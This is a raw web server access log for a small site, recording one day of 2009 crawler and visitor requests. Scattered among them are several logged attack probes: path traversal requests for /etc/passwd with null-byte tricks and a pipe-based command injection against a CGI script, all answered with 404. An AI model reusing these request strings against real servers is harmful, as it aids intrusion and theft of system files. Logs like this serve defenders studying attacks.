65.55.211.162 - - [31/Mar/2009:03:10:29 +0200] "GET /moz_menue.html HTTP/1.1" 404 2748 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
67.195.37.160 - - [31/Mar/2009:03:11:18 +0200] "GET / HTTP/1.0" 200 7869 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.160 - - [31/Mar/2009:03:11:19 +0200] "GET /style/various-euro.css HTTP/1.0" 200 3437 "http://www.various-euro.com/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.160 - - [31/Mar/2009:03:19:48 +0200] "GET /bmpp/18start.html HTTP/1.0" 200 320 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.90 - - [31/Mar/2009:03:52:36 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.90 - - [31/Mar/2009:03:52:36 +0200] "GET /f-logz_old.html HTTP/1.0" 200 43773 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.90 - - [31/Mar/2009:04:02:07 +0200] "GET /DgH/ HTTP/1.0" 200 5024 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.52.143.35 - - [31/Mar/2009:04:19:36 +0200] "GET /f-net.html HTTP/1.1" 200 9913 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
93.182.173.18 - - [31/Mar/2009:04:40:08 +0200] "GET / HTTP/1.1" 200 7869 "http://various-euro.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8"
66.235.124.132 - - [31/Mar/2009:05:32:10 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "-"
66.235.124.132 - - [31/Mar/2009:05:32:10 +0200] "GET /menueleiste.js HTTP/1.1" 404 2748 "http://www.various-euro.com/restate_copy.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
66.235.124.132 - - [31/Mar/2009:05:32:10 +0200] "GET /restate_copy.html HTTP/1.1" 200 97631 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
66.235.124.132 - - [31/Mar/2009:05:32:11 +0200] "GET /detonators.gif HTTP/1.1" 200 14892 "http://www.various-euro.com/restate_copy.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
66.235.124.132 - - [31/Mar/2009:05:32:11 +0200] "GET /bannerz/rebelle.gif HTTP/1.1" 200 6986 "http://www.various-euro.com/restate_copy.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
66.235.124.132 - - [31/Mar/2009:05:32:15 +0200] "GET /framez-restate.html HTTP/1.1" 200 4328 "http://www.various-euro.com/restate_copy.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
66.235.124.132 - - [31/Mar/2009:05:32:16 +0200] "GET /frame-menu.html HTTP/1.1" 200 10536 "http://www.various-euro.com/framez-restate.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
66.235.124.132 - - [31/Mar/2009:05:32:16 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "http://www.various-euro.com/framez-restate.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
66.235.124.132 - - [31/Mar/2009:05:32:16 +0200] "GET /restate_copy.html HTTP/1.1" 200 97631 "http://www.various-euro.com/framez-restate.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
66.235.124.132 - - [31/Mar/2009:05:32:16 +0200] "GET /style/various-euro.css HTTP/1.1" 200 3437 "http://www.various-euro.com/frame-menu.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
66.235.124.132 - - [31/Mar/2009:05:32:16 +0200] "GET /menueleiste.js HTTP/1.1" 404 2748 "http://www.various-euro.com/restate_copy.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
66.235.124.132 - - [31/Mar/2009:05:32:16 +0200] "GET /bannerz/ve.jpg HTTP/1.1" 200 36912 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
66.235.124.132 - - [31/Mar/2009:05:32:16 +0200] "GET /bannerz/various-euro-girl.jpg HTTP/1.1" 200 91514 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
67.195.37.160 - - [31/Mar/2009:05:53:46 +0200] "GET /zampa/ HTTP/1.0" 200 7153 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.90 - - [31/Mar/2009:06:27:57 +0200] "GET /f-contact.html HTTP/1.0" 200 6804 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.156.33.29 - - [31/Mar/2009:06:28:29 +0200] "GET / HTTP/1.1" 200 7869 "http://www.askpeter.info/gosearch.php?pt1=1&pt3=1&pt4=0&pt6=0&pt7=all&pt8=0&pt9=0&q=various-euro" "Mozilla/5.0 (compatible; askpeter_bot/5.0; +http://www.askpeter.info)"
85.66.137.215 - - [31/Mar/2009:06:50:28 +0200] "GET http://www.various-euro.com/index.php?&language=../../../../../../../../etc/passwd HTTP/1.0" 404 2748 "http://www.various-euro.com/index.php?&language=../../../../../../../../etc/passwd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
85.66.137.215 - - [31/Mar/2009:06:50:28 +0200] "GET http://www.various-euro.com/SupportTrio/index.php?pf=kb&page=host/file HTTP/1.0" 404 2748 "http://www.various-euro.com/SupportTrio/index.php?pf=kb&page=host/file" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
85.66.137.215 - - [31/Mar/2009:06:50:28 +0200] "GET http://www.various-euro.com/includefile.php?page=athos&page_file=../../../../../../etc/passwd HTTP/1.0" 404 2748 "http://www.various-euro.com/includefile.php?page=athos&page_file=../../../../../../etc/passwd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
85.66.137.215 - - [31/Mar/2009:06:50:28 +0200] "GET http://www.various-euro.com/mod.php?mod=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 2748 "http://www.various-euro.com/mod.php?mod=../../../../../../../../../../../../../etc/passwd%00" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
85.66.137.215 - - [31/Mar/2009:06:50:28 +0200] "GET http://www.various-euro.com/nodez/?node=system&op=/../../cache/users/list.gtdat%00&cmd=dir HTTP/1.0" 404 2748 "http://www.various-euro.com/nodez/?node=system&op=/../../cache/users/list.gtdat%00&cmd=dir" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
67.202.41.3 - - [31/Mar/2009:06:50:40 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
65.55.37.181 - - [31/Mar/2009:07:02:44 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.37.181 - - [31/Mar/2009:07:02:45 +0200] "GET / HTTP/1.1" 200 7869 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
74.62.161.76 - - [31/Mar/2009:07:27:15 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "flatlandbot/baypup (Flatland Industries Web Spider; http://www.flatlandindustries.com/flatlandbot; jason@flatlandindustries.com)"
74.62.161.76 - - [31/Mar/2009:07:27:16 +0200] "GET /framez.html HTTP/1.1" 200 3959 "-" "flatlandbot/baypup (Flatland Industries Web Spider; http://www.flatlandindustries.com/flatlandbot; jason@flatlandindustries.com)"
98.243.251.63 - - [31/Mar/2009:08:15:37 +0200] "GET / HTTP/1.1" 200 7869 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.7) Gecko/2009030422 Ubuntu/8.04 (hardy) Firefox/3.0.7"
98.243.251.63 - - [31/Mar/2009:08:15:37 +0200] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.7) Gecko/2009030422 Ubuntu/8.04 (hardy) Firefox/3.0.7"
98.243.251.63 - - [31/Mar/2009:08:15:37 +0200] "GET /style/various-euro.css HTTP/1.1" 200 3437 "http://www.various-euro.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.7) Gecko/2009030422 Ubuntu/8.04 (hardy) Firefox/3.0.7"
98.243.251.63 - - [31/Mar/2009:08:15:38 +0200] "GET /framez_0.html HTTP/1.1" 200 12444 "http://www.various-euro.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.7) Gecko/2009030422 Ubuntu/8.04 (hardy) Firefox/3.0.7"
189.137.163.228 - - [31/Mar/2009:08:31:05 +0200] "GET http://various-euro.com/cgi-local/fmgen.pl?|echo;cat /etc/passwd;exit| HTTP/1.0" 404 2748 "http://various-euro.com/cgi-local/fmgen.pl?|echo;cat /etc/passwd;exit|" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
67.195.37.110 - - [31/Mar/2009:08:40:14 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.110 - - [31/Mar/2009:08:40:15 +0200] "GET /neon/warning2.html HTTP/1.0" 200 997 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.90 - - [31/Mar/2009:09:00:41 +0200] "GET /f-horrorkatze.html HTTP/1.0" 200 7865 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.39.216 - - [31/Mar/2009:09:30:35 +0200] "GET /favicon.ico HTTP/1.1" 302 364 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [31/Mar/2009:09:30:35 +0200] "GET /zampa/favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [31/Mar/2009:09:30:35 +0200] "GET /favicon.gif HTTP/1.1" 302 364 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [31/Mar/2009:09:30:35 +0200] "GET /zampa/favicon.gif HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
93.182.173.18 - - [31/Mar/2009:09:38:00 +0200] "GET / HTTP/1.1" 200 7869 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8"
93.182.173.18 - - [31/Mar/2009:10:48:32 +0200] "GET / HTTP/1.1" 200 7869 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8"
82.23.0.212 - - [31/Mar/2009:11:03:37 +0200] "GET / HTTP/1.1" 200 7869 "http://randomwebsite.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"
82.23.0.212 - - [31/Mar/2009:11:03:54 +0200] "GET /style/various-euro.css HTTP/1.1" 200 3437 "http://www.various-euro.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"
82.23.0.212 - - [31/Mar/2009:11:03:56 +0200] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"
82.23.0.212 - - [31/Mar/2009:11:04:10 +0200] "GET /framez_0.html HTTP/1.1" 200 12444 "http://www.various-euro.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"
74.6.8.90 - - [31/Mar/2009:11:06:32 +0200] "GET /logz.html HTTP/1.0" 404 2748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.90 - - [31/Mar/2009:11:25:22 +0200] "GET /neon/large.html HTTP/1.0" 200 1547 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.110 - - [31/Mar/2009:11:50:10 +0200] "GET /schubb/schubb-4.html HTTP/1.0" 200 17746 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.249 - - [31/Mar/2009:11:54:00 +0200] "GET /your_tour.html HTTP/1.1" 200 29760 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.249 - - [31/Mar/2009:12:04:02 +0200] "GET /logs/usage_200903.html HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.235.124.7 - - [31/Mar/2009:12:37:08 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.235.124.7 - - [31/Mar/2009:12:37:23 +0200] "GET /zampa/wonderland/index.html HTTP/1.1" 200 2084 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
74.6.8.90 - - [31/Mar/2009:12:48:04 +0200] "GET /world.html HTTP/1.0" 200 16295 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
93.182.173.18 - - [31/Mar/2009:13:08:19 +0200] "GET / HTTP/1.1" 200 7869 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8"
67.202.41.3 - - [31/Mar/2009:13:46:52 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
65.55.211.160 - - [31/Mar/2009:13:49:31 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.160 - - [31/Mar/2009:13:49:32 +0200] "GET /framez.html HTTP/1.1" 200 3959 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.160 - - [31/Mar/2009:13:51:36 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.211.160 - - [31/Mar/2009:13:51:36 +0200] "GET /frame-menu.html HTTP/1.1" 200 10536 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.211.160 - - [31/Mar/2009:13:51:37 +0200] "GET /frame-inhalt.html HTTP/1.1" 200 5418 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.211.160 - - [31/Mar/2009:13:51:38 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
67.195.37.126 - - [31/Mar/2009:13:56:49 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.126 - - [31/Mar/2009:13:56:50 +0200] "GET /logs/usage_200702.html HTTP/1.0" 200 107861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.126 - - [31/Mar/2009:14:30:52 +0200] "GET /f-bannnerz.html HTTP/1.0" 200 12651 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.126 - - [31/Mar/2009:14:31:02 +0200] "GET /frame-inhalt.html HTTP/1.0" 200 5418 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.126 - - [31/Mar/2009:14:31:03 +0200] "GET /style/various-euro.css HTTP/1.0" 200 3437 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.39.216 - - [31/Mar/2009:14:35:32 +0200] "GET /favicon.ico HTTP/1.1" 302 364 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [31/Mar/2009:14:35:32 +0200] "GET /zampa/favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [31/Mar/2009:14:35:32 +0200] "GET /favicon.gif HTTP/1.1" 302 364 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [31/Mar/2009:14:35:32 +0200] "GET /zampa/favicon.gif HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
67.195.37.126 - - [31/Mar/2009:14:45:00 +0200] "GET /zampa/montenegro/contributions.html HTTP/1.0" 200 18843 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.235.124.7 - - [31/Mar/2009:14:53:14 +0200] "GET /f-actions.html HTTP/1.1" 200 11006 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
114.111.36.26 - - [31/Mar/2009:14:54:07 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/customer_webtxt_02.jsp)"
208.36.144.10 - - [31/Mar/2009:14:54:25 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
114.111.36.26 - - [31/Mar/2009:14:54:27 +0200] "GET / HTTP/1.1" 200 7869 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/customer_webtxt_02.jsp)"
87.250.39.216 - - [31/Mar/2009:15:05:42 +0200] "GET /favicon.ico HTTP/1.1" 302 364 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [31/Mar/2009:15:05:42 +0200] "GET /zampa/favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [31/Mar/2009:15:05:42 +0200] "GET /favicon.gif HTTP/1.1" 302 364 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [31/Mar/2009:15:05:42 +0200] "GET /zampa/favicon.gif HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [31/Mar/2009:15:07:24 +0200] "GET /favicon.ico HTTP/1.1" 302 364 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [31/Mar/2009:15:07:24 +0200] "GET /zampa/favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [31/Mar/2009:15:07:24 +0200] "GET /favicon.gif HTTP/1.1" 302 364 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
87.250.39.216 - - [31/Mar/2009:15:07:24 +0200] "GET /zampa/favicon.gif HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.6042; Windows XP 5.1; MSIE 7.0.5730.13)"
116.81.106.93 - - [31/Mar/2009:15:08:16 +0200] "GET /framez-rez.html HTTP/1.1" 200 4323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)"
66.249.71.249 - - [31/Mar/2009:15:17:06 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.249 - - [31/Mar/2009:15:17:06 +0200] "GET /schubb/schubb-4.html HTTP/1.1" 200 17746 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
189.137.163.228 - - [31/Mar/2009:15:23:11 +0200] "GET http://various-euro.com/index.php?action=../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 2748 "http://various-euro.com/index.php?action=../../../../../../../../../etc/passwd%00" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
189.137.163.228 - - [31/Mar/2009:15:23:11 +0200] "GET http://various-euro.com/image_view.php?file=../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 2748 "http://various-euro.com/image_view.php?file=../../../../../../../../../etc/passwd%00" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
93.182.173.18 - - [31/Mar/2009:15:37:39 +0200] "GET / HTTP/1.1" 200 7869 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8"
66.235.124.7 - - [31/Mar/2009:15:41:20 +0200] "GET /robots.txt HTTP/1.1" 302 363 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.235.124.7 - - [31/Mar/2009:15:41:35 +0200] "GET /zampa/robots.txt HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.235.124.7 - - [31/Mar/2009:15:41:50 +0200] "GET / HTTP/1.1" 302 353 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.235.124.7 - - [31/Mar/2009:15:41:50 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
67.195.37.189 - - [31/Mar/2009:15:50:30 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.189 - - [31/Mar/2009:15:50:31 +0200] "GET /framez_0.html HTTP/1.0" 200 12444 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.90 - - [31/Mar/2009:16:33:53 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.90 - - [31/Mar/2009:16:33:53 +0200] "GET /framez-rez.html HTTP/1.0" 200 4323 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.90 - - [31/Mar/2009:16:33:53 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "http://www.various-euro.com/framez-rez.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.90 - - [31/Mar/2009:16:33:53 +0200] "GET /f-rez.html HTTP/1.0" 200 9765 "http://www.various-euro.com/framez-rez.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.90 - - [31/Mar/2009:16:33:53 +0200] "GET /frame-menu.html HTTP/1.0" 200 10536 "http://www.various-euro.com/framez-rez.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.90 - - [31/Mar/2009:16:33:54 +0200] "GET /style/various-euro.css HTTP/1.0" 304 - "http://www.various-euro.com/frame-menu.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.90 - - [31/Mar/2009:16:57:56 +0200] "GET /neon/click.html HTTP/1.0" 200 521 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.235.124.102 - - [31/Mar/2009:16:59:39 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.235.124.102 - - [31/Mar/2009:16:59:54 +0200] "GET / HTTP/1.1" 200 7869 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.235.124.89 - - [31/Mar/2009:17:00:02 +0200] "GET /framez_0.html HTTP/1.1" 200 12444 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
93.182.173.18 - - [31/Mar/2009:17:07:22 +0200] "GET /cgi-bin/sblogin/report/usermanage.cgi HTTP/1.1" 404 2748 "http://various-euro.com/cgi-bin/sblogin/report/usermanage.cgi" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8"
91.153.155.9 - - [31/Mar/2009:17:07:44 +0200] "GET / HTTP/1.1" 200 7869 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)"
91.153.155.9 - - [31/Mar/2009:17:07:46 +0200] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)"
91.153.155.9 - - [31/Mar/2009:17:07:47 +0200] "GET /style/various-euro.css HTTP/1.1" 200 3437 "http://www.various-euro.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)"
91.153.155.9 - - [31/Mar/2009:17:07:49 +0200] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)"
91.153.155.9 - - [31/Mar/2009:17:12:08 +0200] "GET / HTTP/1.1" 200 7869 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)"
91.153.155.9 - - [31/Mar/2009:17:12:09 +0200] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)"
91.153.155.9 - - [31/Mar/2009:17:12:09 +0200] "GET /style/various-euro.css HTTP/1.1" 200 3437 "http://www.various-euro.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)"
74.6.8.90 - - [31/Mar/2009:17:13:28 +0200] "GET /bmpp/18.html HTTP/1.0" 200 4467 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.90 - - [31/Mar/2009:17:18:16 +0200] "GET /logs/usage_200703.html HTTP/1.0" 200 108444 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
